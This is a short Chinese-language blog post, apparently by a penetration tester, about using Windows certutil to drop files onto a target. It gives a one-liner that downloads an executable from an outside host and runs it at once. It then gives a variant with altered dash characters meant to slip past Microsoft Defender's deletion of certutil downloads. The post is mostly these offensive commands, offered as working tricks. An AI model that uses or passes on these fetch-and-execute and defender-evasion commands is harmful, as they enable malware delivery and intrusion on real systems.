一段时间的工作后,在实际项目中也学到了不少东西,于是就产生了写一篇博客来记录工作中的一些小trick
certutil 一般可以用来进行文件落地
certutil.exe -urlcache -split -f http://www.secbook.info/ppss.exe temp.exe && temp.exe
但是后来 defender会对certutil下载的文件进行删除(不管是否有害)
.jpg)
但是可以通过以下命令进行绕过
certutil ûurlcache ûsplit ûf http://www.secbook.info/robots.txt C:\Users\Public\temp.exe
Comments | NOTHING